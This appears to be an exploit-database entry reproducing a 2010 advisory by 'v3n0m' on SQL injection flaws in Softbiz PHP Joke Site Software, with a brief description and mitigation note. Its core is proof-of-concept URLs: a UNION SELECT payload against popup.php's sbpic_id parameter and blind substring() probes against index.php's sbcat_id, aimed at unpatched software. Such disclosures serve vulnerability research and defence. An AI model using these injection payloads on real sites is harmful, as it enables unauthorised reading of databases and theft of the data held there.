header-logo
Suggest Exploit
vendor:
PHP Joke Site Software
by:
v3n0m
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Joke Site Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Softbiz PHP Joke Site Software Multiple SQL injection Vulnerability

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. The attacker can use the UNION operator to combine the results of two or more SELECT statements into a single result set. The attacker can also use the substring() function to extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
  Softbiz PHP Joke Site Software Multiple SQL injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: December, 18-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: PHP Joke Site Software
Price		: $29
Vendor  	: http://www.softbizsolutions.com/

Exploit & p0c
_____________

**[SQLi]
http://site/[path]/popup.php?sbpic_id=[SQLi]
http://site/[path]/popup.php?sbpic_id=-9999+union+all+select+1,2,3,version(),5,6,7,8,9,10,11--

**[Blind SQLi]
http://site/[path]/index.php?sbcat_id=[Blind SQLi]
http://site/[path]/index.php?sbcat_id=6+and+substring(version(),1,1)=5  << true
http://site/[path]/index.php?sbcat_id=6+and+substring(version(),1,1)=4  << false

_______________________________________

All YOGYACARDERLINK CREW & Jovita Andy
_______________________________________